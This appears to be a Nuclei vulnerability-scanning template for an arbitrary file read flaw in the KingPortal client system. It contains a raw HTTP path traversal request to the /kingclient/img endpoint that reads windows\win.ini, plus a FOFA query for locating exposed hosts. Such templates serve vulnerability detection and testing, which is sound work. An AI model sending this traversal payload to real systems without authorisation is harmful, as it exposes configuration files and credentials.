http:
    - matchers:
        - part: body
          type: word
          words:
            - ; for 16-bit app support
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /kingclient/img?imgPath=..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
id: KingPortal-img-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="/public/javascripts/Common/Util/km_util.js"
        KingPortal客户端开发系统 img 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: KingPortal客户端开发系统 img 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247489023&idx=1&sn=c9a1486e4a49fd68e5178e74d49a0d91&chksm=c267a0ccf51029da9c4b44e1f945d0da102b2de1745473cecc07c5f0c71094810e63eaa43f0e&token=314927155&lang=zh_CN#rd
    severity: high
    tags:
        - File reading
